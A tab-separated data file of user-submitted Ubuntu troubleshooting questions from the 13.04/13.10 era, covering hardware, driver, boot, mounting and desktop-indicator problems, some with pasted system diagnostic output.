365165	problem with my keyboard on ubuntu 13.10	i have a compaq presario cq62-219wm notebook laptop running ubuntu 13.10 , and there is something wrong with my keyboard . it will stop working all of a sudden and force me to plug in an external keyboard . it worked perfectly with windows 7 , but is n't great with ubuntu . is there any type of driver or update available to fix it ?
365166	firefox problems with refreshing content on screen	i had this problem in 13.04 but now in 13.10 this problem is a lot more noticable . when firefox loads page it sometimes 'forgets ' to redraw the screen , so my page stays as it is , and when i hover over some parts of website they start to appear . sometimes i have to zoom in and out to 'force ' firefox to refresh screen . hardware acceleration is turned on but it 's the same when i turn it off .
365167	can not reinstall ubuntu alongside windows 7	i made deep research on the internet and unfortunately can not found the answer . i installed ubuntu 10.04.4 server ( via usb ) alongside windows 7 ( firstly i had to resize my partitions and then released some free space using easeus partition master ) , everything works fine , but then realized that server version does n't have gui , so i just deleted partitions created for ubuntu , unfortunately because of that i had some problems with booting win7 but fixed it . then i downloaded desktop version and here is a problem , after starting computer and choosing boot via usb there is just blinking cursor and black screen . i tried with alternate version , version 13.04 and again server version 10.04 ( just like in the first time ) and it still have the same reaction . i am using dell vostro 3500 with nvidia graphic card . i found some advices but most of all was regarding when ubuntu was just installed or there was screen showing functions like nomodeset or acpi . no one regarding situations before installation and when server version works fine in the first time . i will be very grateful if you help me .
365168	xubuntu 13.10 bluetooth applet not working	i upgraded to xubuntu 13.10 this morning . i am not able to get the bluetooth working on this version . like in the question asked : volume indicator problem the bluetooth indicator also gives a small gray box . even if i connect the bluetooth headset through bluetooth manager gui , pulseaudio does n't show the option in the configuration tab . anyone knows the solution ? i am not able to give the screenshot as screenshooter does n't work if the bluetooth applet is clicked .
365171	user can not mount disks after upgrade to saucy	i upgraded to saucy and i am not able to mount any disks any more , because i am not permitted : i am able to mount the disk with mount , but that is not really a solution ... how can i enable mounting for the user again ? output of commands blkid /dev/sda5 : uuid= '' fd5c349d-683e-4958-9fd2-bd825f10b471 '' type= '' ext4 '' /dev/sdb1 : uuid= '' 4e0ae3da-4001-43c7-99b4-95112b9177fd '' type= '' ext4 '' /dev/sdc1 : label= '' mu-3-466g-info '' uuid= '' 6c680a34-5392-4cff-8f9a-ac9c906db75f '' type= '' ext4 '' /dev/sdc2 : uuid= '' 764d42e6-66af-413c-9148-2709c8b084c1 '' type= '' crypto_luks '' fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0719ee6e device boot start end blocks id system /dev/sda2 2046 593893375 296945665 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 2048 554829823 277413888 83 linux disk /dev/sdb : 30.0 gb , 30016659456 bytes 255 heads , 63 sectors/track , 3649 cylinders , total 58626288 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e8129 device boot start end blocks id system /dev/sdb1 * 2048 58626047 29312000 83 linux disk /dev/sdc : 500.1 gb , 500107859968 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773164 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007fa35 device boot start end blocks id system /dev/sdc1 63 208844 104391 83 linux /dev/sdc2 208845 976768064 488279610 83 linux cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=4e0ae3da-4001-43c7-99b4-95112b9177fd / ext4 discard , errors=remount-ro 0 1 # /home was on /dev/sda5 during installation uuid=fd5c349d-683e-4958-9fd2-bd825f10b471 /home ext4 defaults 0 2 # /tmp was on /dev/sda7 during installation # uuid=c0e28121-6b95-459a-8f88-3e9ee11292aa /tmp ext4 defaults 0 2 # /var was on /dev/sda6 during installation # uuid=9eaadf4b-95ef-40d3-860f-48e6f4ea9186 /var ext4 defaults 0 2 # swap was on /dev/sda1 during installation # uuid=e2a27ad7-d887-4fe7-831f-bbde2e4e3056 none swap sw 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0
365172	ubuntu 13.10 unity sound indicator - wo n't display changes	so , interesting problem . what i have done : i click the sound indicator and adjust the volume with no problems . i can use the sound keys on my keyboard and it works without an issue . i can adjust and manipulate the sound in any fashion and it works . however , the indicator itself ( speaker looking icon ) will not show changes . such as , if i press mute , it will indeed mute , but the icon will not show an `` x '' , but the sound level will be all the way down , will indicate a red-x speaker notification . the slider will change based on how i adjust the sound , but the speaker icon will not lose it 's `` rings '' ( little vertical lines to the right of speaker icon ) . what i know i know there has been a recognized bug in lubuntu xfce that the indicator does not work , but the issues i am having are not like theirs . my sound operates as it should , the unity indicator is not . what i have done i have tried some quick fixes i have seen to no avail they are : editing usr/share/dbus-1/services/indicator-sound.service and changing '' exec=/usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service '' to '' exec=/usr/lib/indicator-sound-gtk2/indicator-sound-service '' the above did not work for me just wanted to indicate in case someone is blindly changing files thinking i found a fix . any help ? edit : to make things more interesting , the indicator works 100 % as it should on the login screen but not once i log in . output of sudo dpkg -l | grep indicator : ii gir1.2-appindicator3-0.1 12.10.1+13.10.20130920-0ubuntu2 amd64 typelib files for libappindicator3-1 . ii gir1.2-syncmenu-0.1 12.10.5+13.10.20131011-0ubuntu1 amd64 indicator for synchronisation processes status - bindings ii indicator-application 12.10.1daily13.01.25-0ubuntu1 amd64 application indicators ii indicator-appmenu 13.01.0+13.10.20130930-0ubuntu1 amd64 indicator for application menus . ii indicator-bluetooth 0.0.6+13.10.20131016-0ubuntu1 amd64 system bluetooth indicator . ii indicator-cpufreq 0.2.2-0ubuntu1 all cpu frequency scaling indicator ii indicator-datetime 13.10.0+13.10.20131016.2-0ubuntu1 amd64 simple clock ii indicator-keyboard 0.0.0+13.10.20131010.1-0ubuntu1 amd64 keyboard indicator ii indicator-messages 13.10.1+13.10.20131011-0ubuntu1 amd64 indicator that collects messages that need a response ii indicator-multiload 0.3-0ubuntu1 amd64 graphical system load indicator for cpu , ram , etc . ii indicator-power 12.10.6+13.10.20131008-0ubuntu1 amd64 indicator showing power state . ii indicator-printers 0.1.7daily13.03.01-0ubuntu1 amd64 indicator showing active print jobs ii indicator-session 12.10.5+13.10.20131004-0ubuntu1 amd64 indicator showing session management , status and user switching ii indicator-sound 12.10.2+13.10.20131011-0ubuntu1 amd64 system sound indicator . ii indicator-sound-gtk2 12.10.0.1-0ubuntu2 amd64 system sound indicator . ii indicator-sync 12.10.5+13.10.20131011-0ubuntu1 amd64 indicator for synchronisation processes status ii indicator-sysmonitor 0.4.3 all system monitor indicator rc indicator-weather 13.7.1 all indicator that displays weather information ii libappindicator3-1 12.10.1+13.10.20130920-0ubuntu2 amd64 application indicators ii libindicator3-7 12.10.2+13.10.20130913-0ubuntu1 amd64 panel indicator applet - shared library ii libindicator7 12.10.2+13.10.20130913-0ubuntu1 amd64 panel indicator applet - shared library ii libsync-menu1 : amd64 12.10.5+13.10.20131011-0ubuntu1 amd64 indicator for synchronisation processes status - libraries ii my-weather-indicator 0.6.5-0extras13.04.2 all get weather information for your town with my-weather-indicator ii sni-qt : amd64 0.2.6-0ubuntu1 amd64 indicator support for qt ii telepathy-indicator 0.3.1daily13.06.19-0ubuntu1 amd64 desktop service to integrate telepathy with the messaging menu .
365174	fuji camera `` mounts '' but folder not in dolphin after kubuntu 13.10 upgrade	fuji camera mount reported in attached devices but not visible in dolphin after kubuntu 13.10 upgrade have reinstalled the driver , and a few other suggestions , for other cameras mounts failing on previous ubuntu upgrades . i have already spent a couple of hours trying to get my photo 's off the camera , very annoying . worked perfectly in 11.04 , 11.10 , 12.04 , 12.10 and 13.04. dmesg | tail ; lsusb ; lsb_release -a [ 6181.858786 ] cpum : apic 03 at 00000000fee00000 ( mapped at ffffc90009400000 ) - ver 0x80050010 , lint0=0x10700 lint1=0x10400 pc=0x00400 thmr=0x10000 [ 17261.396236 ] cpum : apic 00 at 00000000fee00000 ( mapped at ffffc90000c6a000 ) - ver 0x80050010 , lint0=0x10700 lint1=0x00400 pc=0x00400 thmr=0x10000 [ 17261.396239 ] cpum : apic 03 at 00000000fee00000 ( mapped at ffffc90000c72000 ) - ver 0x80050010 , lint0=0x10700 lint1=0x10400 pc=0x00400 thmr=0x10000 [ 17261.396241 ] cpum : apic 02 at 00000000fee00000 ( mapped at ffffc90000c70000 ) - ver 0x80050010 , lint0=0x10700 lint1=0x10400 pc=0x00400 thmr=0x10000 [ 17261.396255 ] cpum : apic 01 at 00000000fee00000 ( mapped at ffffc90000c6e000 ) - ver 0x80050010 , lint0=0x10700 lint1=0x10400 pc=0x00400 thmr=0x10000 [ 32456.884907 ] usb 2-5 : new high-speed usb device number 2 using ehci-pci [ 32457.654046 ] usb 2-5 : new usb device found , idvendor=04cb , idproduct=01e8 [ 32457.654050 ] usb 2-5 : new usb device strings : mfr=0 , product=2 , serialnumber=3 [ 32457.654052 ] usb 2-5 : product : digital camera [ 32457.654053 ] usb 2-5 : serialnumber : 4c3230302020091117caa59wp18548 bus 002 device 002 : id 04cb:01e8 fuji photo film co. , ltd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 2013:024f pctv systems nanostick t2 290e bus 001 device 002 : id 046d:082d logitech , inc. hd pro webcam c920 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub no lsb modules are available . distributor id : ubuntu vissibledescription : ubuntu 13.10 release : 13.10 codename : saucy sudo apt-get install gvfs-bin gvfs-mount gphoto2 : // [ usb:002,002 ] error mounting location : error initializing camera : -108 : no such file or directory ... ... i have reported a bug in dolphin , which has been transferred to solid . further information : i ran solid-hardware list details udi = '/org/kde/solid/udev/sys/devices/pci0000:00/0000:00:04.1/usb2/2-5 ' parent = '/org/kde/solid/udev ' ( string ) vendor = '04cb ' ( string ) product = 'digital camera ' ( string ) description = 'camera ' ( string ) block.major = 189 ( 0xbd ) ( int ) block.minor = 137 ( 0x89 ) ( int ) block.device = '/dev/bus/usb/002/010 ' ( string ) camera.supportedprotocols = { 'ptp ' } ( string list ) camera.supporteddrivers = { 'gphoto ' } ( string list ) i still ca n't get my photo 's off , i can see the folders using the gimp menu . if anyone has got any ideas , i 'm willing to try them . > update > , still need help , its impracticable to get photos of a camera from gimp menu . my only option is to use a different pc ( 12.04 or w*ndowes . ) and copy it back of that . i will try any suggestions to fix 13.10 . > update 17th november , no ideas to try ? ? ? ? ? ? ? ? ? update 2 december 2013 , no ideas to try , yet !
365177	hardware wireless switch has no effect after suspend and 13.10 upgrade	this seems to be a fairly chronic problem , as shown by the following questions : how do i fix a `` wireless is disabled by hardware switch '' error ? wireless disabled by hardware switch '' wireless disabled by hardware switch '' after suspend and other hardware buttons ineffective - how can i solve this ? but no good solutions have been found ! wireless works fine after a reboot , but after a suspend the hardware switch ( for my laptop this is f12 ) has no effect on the wireless , it is just permanently off , and shows that it is with a red led . all my rfkill list all reads : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes any combination with rfkill < un > block wifi does n't work , although one time first blocking then unblocking actually turned it on again . sudo lshw -c network reads : *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 78 : e4:00:65:2e:3f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:90100000-9010ffff *-network disabled description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : c8:0a : a9:89 : b4:30 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory:90010000-90010fff memory:90000000-9000ffff memory:90020000-9002ffff also , adding a /etc/pm/sleep.d/brcm.sh file as recommended here simply prevents the laptop from suspending at all , which of course is no good . this question has an answer urging to install the original driver , but it was n't an `` accepted answer '' so i 'd rather not take a chance on it . also i 'll admit i 'm a bit lost on that and would like help doing so with the specific information i 've given . xev shows that no internal event is triggered for my wireless switch ( f12 ) , but other function keys also acting as hardware switches work fine . edit this does n't matter , since xev shows no event even when the switch is properly working . i 'm considering removing this paragraph ... . i would be happy to provide more information , so long as you 're willing to help me find it for you ! this is a very annoying bug . i have a compaq presario cq62 . edit . i just tried to reload bios defaults ( or something ) as shown by this video . did n't work . edit . i tried the contents of this answer , and it did n't work . edit . output of lspci | grep network : 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) edit . pastebins of more lengthy outputs are given below in the comments . edit . i do n't know if i 'm right , but i found this line in dmesg : [ 0.198949 ] acpi pnp0a08:00 : acpi _osc support notification failed , disabling pcie aspm which seems like it might be something , since it refers to pci ... . i 'm a noob who 's trying my best ! edit . this ? from dmesg ? it has the name ath and phy0 which relates to the driver and one of the network interfaces ( as far as i know ) . [ 106.592792 ] ath : phy0 : aspm enabled : 0x43 edit . this morning , i had had the laptop suspended all night , and then when i tried to awake it , it simply would n't . it would try , and then it would sleep again ( i guess it felt a little bit like me ! < /badjoke > ) . is it possible these problems are related ?
365187	external hdd boot entries added to grub after upgrade to 13.10	long story short , i was using my laptop 's internal hdd as an external one on my desktop , and i forgot to remove it when i was upgrading to 13.10 . now grub on my desktop has added entries for the windows and ubuntu partitions that exist on the laptop 's hdd , but i do n't want them to be there . can i safely remove them ? my grub table looks like this if i recall correctly : ubuntu advanced options ( or something like this ) memtest another memtest entry windows 7 ( loader ) on /dev/sda1 windows 7 ( loader ) on /dev/sdb1 ubuntu 13.04 advanced options for ubuntu 13.04 where windows 7 ( loader ) on /dev/sdb1 ubuntu 13.04 advanced options for ubuntu 13.04 are the entries from the external/laptop 's hdd .
365192	what determines ppa updates after new ubuntu releases ?	before upgrading to saucy , i had several ppas installed . as usual , the upgrade process disabled the ppas . afterwards , i re-enabled the ppas in software sources ( making sure that the release was set to saucy ) and ran an update . some of the ppas worked , but others gave 404 errors : w : failed to fetch http : //ppa.launchpad.net/duplicity-team/ppa/ubuntu/dists/saucy/main/binary-i386/packages : 404 not found w : failed to fetch http : //ppa.launchpad.net/stackapplet-dev/stackapplet/ubuntu/dists/saucy/main/binary-i386/packages : 404 not found ... evidently , this common issue occurs because these ppas have n't been updated to provide packages for saucy ( when i browse to the ppa urls , only releases through raring are listed ) . `` how can i fix a 404 error using a ppa ? '' suggests removing the ppas to fix the errors . however , i do n't want to remove these ppas because i believe they are still maintained . for instance , https : //launchpad.net/~stackapplet-dev/+archive/stackapplet had a new upload a few weeks ago . i assume that if i just wait , these ppas will eventually get updated to support saucy . what determines when this happens after a new release of ubuntu ? does it only happen once the maintainer uploads a new version on launchpad ? how long will i have to wait ?
365195	`` com.canonical.indicator.messages '' entry missing from dconf-editor ; issues with email message indicator	on my 12.04.03 system i do n't have com.canonical.indicator.messages . even after sudo apt-get install indicator.messages mail count and new mail notification seems flaky on 12.04 . it used to work after a fresh install , but somehow seems to have gotten corrupted ... any ideas ?
365199	how can i disable `` sync to vblank '' ?	i am developing a gtk application with opengl . how can i disable sync to vblank to test and debug my application ? i tried nvidia-settings , this works for glxgears fine but not for my application . i also tried ccsm but this seem to have no effect at all . the problem is since 13.10
365200	12.04 session-fallback-mode application icon	i 'm trying to make my application show it 's systray icon in ubuntu 12.04 session-fallback-mode . it shows ok in unity 's systray . have tryied to look in gconf-editor , but could n't find any relevant key . i also tried to install several packages that has `` indicator '' word in them , with no success . anyone knows how can i solve this ? thanks
365203	locked out by xscreensaver	in my ubuntu 13.04 , i suddenly found that though i can login , i am immediately blocked by xscreensaver . so , i can no longer get into my account . i do have the root password if needed , and can get into another account . how do i disable/remove xscreensaver ?
365205	text-editors in eclipse/matlab loses focus occasionally after upgrading to 12.04	this is a question asked on stackoverflow , and someone there recommends me to move the question here . my problem is that , i have just upgraded from ubuntu 10.04 to 12.04.3 lts . an annoying thing is that , in eclipse and matlab , the text editor loses focus sometimes . the detailed phenomena are as follows : eclipse happens after using auto-completion ( activated by customized shortcut alt+/ ) , or switching from other windows , or pressing ctrl+z , etc . can use mouse to move cursor around , but keyboard does not respond . using alt-tab to switch back and forth , or click some other parts of the window and click the text field again , can solve the problem . and similar things are happening in matlab , whenever i hit tab . but gedit and browsers are working fine . i 've looked around and tried to disable all kinds of related system shortcuts ( such as alt for dashboard popup ) , and login with gnome classic/ubuntu2d/etc , but none of them solve the problem . wonder if anyone knows how to get around of it . thanks .
365213	remote login onto server and let someone else see your shell ?	i remember that i was logged in into my server and my friend connected . some command let him see my shell and see what i am typing . what command was that ?
365216	what 's the lastest version of openstack that i can deploy with juju ? where can find this information ?	i 've been trying to deploy openstack . i thought havana was the latest , but deployed nova cloud controller , and the log said 2013-10-24 19:13:25 info juju juju-log.go:66 nova-cloud-controller/0 : fatal error : invalid cloud archive release specified : precise-updates/havana . is there somewhere to see what the latest juju deployable ( with the standard repositories ) version is ? or am i just using the wrong format when i specify openstack-origin : cloud : precise-updates/havana in the config ?
365218	how do i find out which application plays sound ?	so i keep having a sound that was playing often in the background and no event seems to be tied to it , that sounds very similar to service-login.ogg in /usr/share/sounds/ubuntu/stereo/ . i do n't know what other information to give but its driving me nuts and like i said i ca n't see any event or program that is causing it to happen . any help with what it is , or tracking it down is greatly appreciated .
365219	i 've the menu twice in 13.10/unity after trying gnome flashback and installing nvidia-prime	i tried gnome flashback and installed nvidia-prime just after , so maybe one of these is responsible . i 've got a messed up interface under unity with menus in the system bar and in the app itself . how do i keep menu only in the system bar ? and with the right theme ? i went to setting to put the default theme back with no luck . below is a screenshot of the problem thx !
365223	puzzled by `` no space '' complaint from apt	background : my / partition was at 93 % , but i had some unallocated space so i created a new home for /usr . after the move the space usage looks like : > df -k filesystem 1k-blocks used available use % mounted on //dev/sda1 15747484 6822736 8124800 46 % / udev 1954244 4 1954240 1 % /dev tmpfs 786052 1040 785012 1 % /run none 5120 0 5120 0 % /run/lock none 1965124 512 1964612 1 % /run/shm cgroup 1965124 0 1965124 0 % /sys/fs/cgroup /dev/sda5 62993332 30014168 29779216 51 % /home /dev/sda7 26540640 32 26540608 1 % /windows /dev/sda8 10320184 7156516 2639432 74 % /usr now the system runs but when i allowed a normal software update , the kernel headers portion produced an error : dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-55_3.2.0-55.85_all.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-55/arch/arm/mach-pxa/include/mach/eseries-irq.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-55/arch/arm/mach-pxa/include/mach/eseries-irq.h ' ) : no space left on device this `` space '' complaint and the df output above seem to contradict one another . i get the same error when i try fixing the repository ( sudo apt-get -f install ) . thinking i had too many old kernel versions i tried removing some ( sudo apt-get remove linux-headers-3.2.0-38 linux-headers-3.2.0-38-generic linux-image-3.2.0-36-generic ... ) but this produces an error and a suggestion that i try apt-get -f install . some system information : > uname -a linux < hostname > 3.2.0-55-generic-pae # 85-ubuntu smp wed oct 2 14:03:15 utc 2013 i686 i686 i386 gnu/linux > cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' i 'm afraid i wo n't be able to update any software until i get this headers issue resolved . i hope someone out there can help .
365224	dazzle dvc 80 on ubuntu ?	can i use dazzle digital video creator ( dvc ) 80 on ubuntu ? it does n't work in windows vista/7/8 only on xp but i do n't want to install xp and i would like to use it in ubuntu . i have ubuntu 12.04 on my sony vaio so if you know how to install it i would love some help .
365232	help installing windows 8 partition	i have installed the most recent version of ubuntu , i always loved linux but this is the first time i have ever installed it on my pc . the fact is that i am a gamer and i wanted to install a windows8 partition so as to play games in there , and use ubuntu for all the rest . the problem is i was so enthusiastic of having linux that i installed ubuntu first , now i cant find a way of installing win8 and i cant divide my disk because i keep on having windows error saying it is n't a compatible partition to install windows in . i read in tutorials that i had to use grub so as to bring back mbr so as to install windows , but the tutorials used old versions of grub , and i cant find a way in grub 2.0 to bring the boot back . also i read i had to use g parted , but this was n't effective either . if anyone knows how to install windows8 in a partition already having ubuntu please help
365236	change super keyboard for mac	i am using 13.10 and i cant seem to figure how to change the super from option/alt to command . i 've tried autokey and this , both to no avail . i 'd really like to switch the copy/paste and alt tab to the command button
365238	how many monitors support the radeon hd 6870 eyefinity with ubuntu ?	how many monitors the radeon hd 6870 eyefinity supports with the latest version of ubuntu ? at the moment i have 4 monitors configuration connected to these ports : 2 dvi 2 minidv with dvi adapter i have read about the mst displayport connection but i do n't know if it works in ubuntu . this is the device : this is my workspace :
365240	graphics problems : noise-like glitch , and screen freezes in ubuntu 13.04	i have recently upgraded to 13.04 and am using unity . i am experiencing two intermittent problems with the graphics : 1 ) all or part of the screen is taken up by 'noise ' , which lasts for about a second , see screenshot : 2 ) the launcher panel freezes . i can still move the mouse and the keyboard responds to function keys ( i can dim the screen ) , but i can not select anything . at the moment i recover by ctr-alt-f1 , and restarting lightdm . my computer is a samsung chronos 7 laptop , model np700z5c , with intel hd 4000 graphics the same problems occur with lightdm and gdm . i have attempted to install the intel drivers ( as the screenshot hints ) but these are not indicated as additional drivers in software & updates so i 'm not sure whether they are in use . any suggestions ?
365247	touchring on intuos4 seems to send wrong keystroke	i 've just finished setting up my intuos4 on ubuntu 13.04 and everythings gone well so far , button mapping is finally responsive ( it was n't before ) and most everything works except the touch ring on the left . it seems that the actions its supposed to have do n't actually work , the middle button just switches the led light between dots , but the functions do n't change , it appears that whatever i set my 3rd button ( from the top ) too , the touch ring sends the same keystroke , also it only works when you move it counter-clockwise , clockwise it sends no other of my custom keystrokes . so could you guys help me out ? not to used to this , but iirc there was a terminal configuration similar to the button mapping just without the gui , maybe i can see/change the problem from there ... any help is appreciated .
365248	adding grub2 menu-entry for iso using grml-rescueboot	following this official ubuntu documentation page and the steps outlined under `` creating the grub2 menuentry - grml-rescueboot '' , i tried to add an i386 desktop iso of the old feisty fawn ( 7.04 ) to the entries already present ( windows 7 , and ubuntu 12.04 ) . upon reboot , the entry appears fine at the end of the menu list options ; but upon clicking it , the computer goes busy briefly , then goes back to the menu . any ideas ? i do n't think it 's because of the age of the distro as it should run fine on my netbook ( no uefi , etc. ) . did i miss a needed step except for steps 1-3 outlined in the article ? if this can not be remedied : is there another way of adding an iso to the grub2 menu - without having to manually create a grub2 menuentry which i 'd rather avoid ?
365249	my hp printer driver keeps vanishing	i have no trouble installing the software for my hp 2015 . however , the software is now `` vanishing '' and i ca n't find the printer from the printer menu . i reinstall the software , which works for a few hours , then it disappears again . any suggestions ?
365252	show c output in gedit 's embedded terminal	i use gedit to write simple c code ( learning basic c now ) . there is a plugin to embed terminal into gedit , like : i want to have a shortcut key , say f5 to compile the current .c file ( gcc -o ... ) and run its compiled executable . the compilation and the executed output should be inside the embedded terminal . i know that there is a external tool plugin , but the output is shown in `` shell output '' , like if is there a way to make the job done in the embedded terminal ?
365253	can unbuntu 13.03 be loaded with flash drive ? usb	i am wanting to do a split pc , half win xp , half unbuntu 13.04 , want to use the linux for internet surfing , youtube , crackle , hulu videos viewing . my pc is a older dell c521 , 1.87ghz , 1.5 gb ram , 32bit , 80gb hd ... will this be better than present slow slow slow win xp ? need it for internet mostly . would consider dumping win xp later on if i get the hang of the linux distro ... any help appreciated . thanks
365261	usb startup disk creator does n't open !	i have a problem . i am trying to open usb startup disk creator ( system > administration > usb startup disk creator ) but it does n't open . what should i do to open it ? please help me ! ! !
365262	set up the fingerprint scanner on a dell v131 ( 138a:0011 ) ?	i have installed the fingerprint gui , however my fingerprint device ( 138a:0011 ) does not appear in the list of supported readers . what should i do ? specs : dell vostro v131 with ubuntu 13.04 ( 64 bits ) .
365266	i get an error in the ubuntu terminal	i recently installed ubuntu 13.04 on my pc and i decided it 's time to make a custom rom for my phone ( miui v5 in this case ) i used the instructions from the patchrom developer guide from the miui porting contest running till 31 october 2013 . every time after entering a series of commands including adb reboot recovery ( which means my device is enabled in adb ) and it 's working . but when i come to the part when i have to enter ( tools folder directory ) /ota_target_from_phone -r i get an error that the command is not found . can someone tell me what 's the problem . i have the latest versions of android sdk , and android kitchen on my pc . i still do n't know what causes this problem . see this image and please see what 's the problem now the command works but i get another error it say 's device not found . about the previous error : i was n't entering the directory right
365268	system keeps booting into windows instead of giving an option to choose	i installed ubuntu 13.10 in my windows with the windows installer . i followed the instructions , and everything was happening as it should have . when it says to reboot , my computer goes for it , but it reboots with my windows 7 instead of giving me the choice as it is supposed to do . what should i do ? thanks .
365274	desktop is all blurred ! help !	i 'm in desperate need of help . i have no idea why my desktop is getting all blurred when i move things around on the screen or move between screens , minimize things , or highlight icons on the desktop . i am running 12.04 ubuntu . this started happening after i restarted after running out of battery . thanks ! ! ! ! ! !
365279	ubuntu 13.10 installer freezes on partition recognition on alienware m17x	i 'm trying to install ubuntu 13.10 on an alienware m17x , after bypassing the graphical problems with `` nomodeset '' ( annoying ! ) , i 'm facing a rather different problem : i click on `` install ubuntu '' , the guided installation progress reach the point where the partition , mount point etc . needs to be selected and ... nothing . in the partition selection menu it sees only dev/sda , but in the window where the actual way the disk is partitioned should appear nothing shows , it 's blank . i 've tried to click on `` change ... '' to try to force it to read something , but the installer simply quits . the button `` change partition table '' etcetera are greyed out ( well , obviously , since no partition table has been read ) . what 's that ? the alienware has windows 7 and legacy bios ( so no uefi here ) . anyone has an idea ? thanks for your time and help !
365281	sd card wo n't appear after upgrade to 13.10	my sd card wo n't mount when i put it into my lap top , everything was fine before the upgrade . the information about the sd card appears just fine when i type sudo fdisk l it just says that it does n't have a valid partition table . when i type sudo blkid i get the following answer : /dev/sda1 : uuid= '' cca8-9030 '' type= '' vfat '' /dev/sda2 : uuid= '' 8a1d135b-384b-432d-b608-64dcf09ada24 '' type= '' ext2 '' /dev/sda3 : uuid= '' 7s6ptu-kj2z-n8xd-0mzl-840i-i3hg-enlbaf '' type= '' lvm2_member '' /dev/sr0 : label= '' bamboo cd '' type= '' iso9660 '' /dev/mapper/ubuntu -- vg-root : uuid= '' c9b521c8-7c9f-493b-95c8-a7d79c465318 '' type= '' ext4 '' /dev/mapper/ubuntu -- vg-swap_1 : uuid= '' 7f155ab6-e1b9-485b-a2bc-443c0622284d '' type= '' swap '' when i use lsusb : bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 13d3:5710 imc networks uvc vga webcam bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 046d : c52f logitech , inc. unifying receiver bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i 've read the other threads and i could n't really find any good answers , my card reader was compatible with the previous version of ubuntu , so technically it should still be compatible with the next version . also i ca n't erase what 's on the card , it contains important data which i need . if you need anymore information just ask , i 'll give it as soon as i can .
365283	terminal malfunction	my terminal does n't open anymore , what should i do ? it wo n't open when i use the hot key and wo n't work when i click on the program itself , i 'm running ubuntu 13.04 by the way . please help me !
365285	is there a program capable of producing a nifty visual representation of file and directory ages ?	ubuntu 's disc usage analyser can produce a very nifty set of rings charts in which area is proportional to drive space used by directories . is there a program capable of producing a similar ( or better ) visual representation of other directory and file characteristics ? the specific characteristic i want to look at is file ages ( last modification times ) or , if possible , extrapolated directory ages .
365287	magic jack and linux	can i register magic jack 014 on a friend 's pc and then connect mj hardware to my router ? i ca n't register it on linux ?
365288	usb keyboard stopped working in terminal window after update from 13.04 to 13.10	when i start the computer , i am logged in automatically . using the keyboard , i type ctrl+alt+t , which brings up a terminal window , just like it should ; however , nothing happens when i attempt to type into the terminal . if i change over to the guest account , i can type into the terminal , but ( different problem here , i 'll ask it separately unless someone is kind enough to answer it here ) my password does n't work for sudo or anything else . elsewhere i read that language support could fix it , but that wo n't accept my password either - and no , i have n't changed it lately . also , my plex media server seems to have disappeared . i 'll re-install everything if necessary , but i sure would rather avoid that if possible
365290	need help with ubuntu problom .	just installed ubuntu 12.04 memory : 4.9gib processor : pentium ( r ) dual-core cpu e5200 @ 2.50ghz ă 2 os type : 32-bit ( i know i installed the 64bit from ubuntu download ) disk 624.7 gb graphics : unknown ( have a geforce gtx 650 ) searched additional drivers clicked on activate and got this error : sorry , installation of this driver faild . please have a look at the log file for details : /var/log/jockey.log i can post this but it is long . need help getting back to normal .
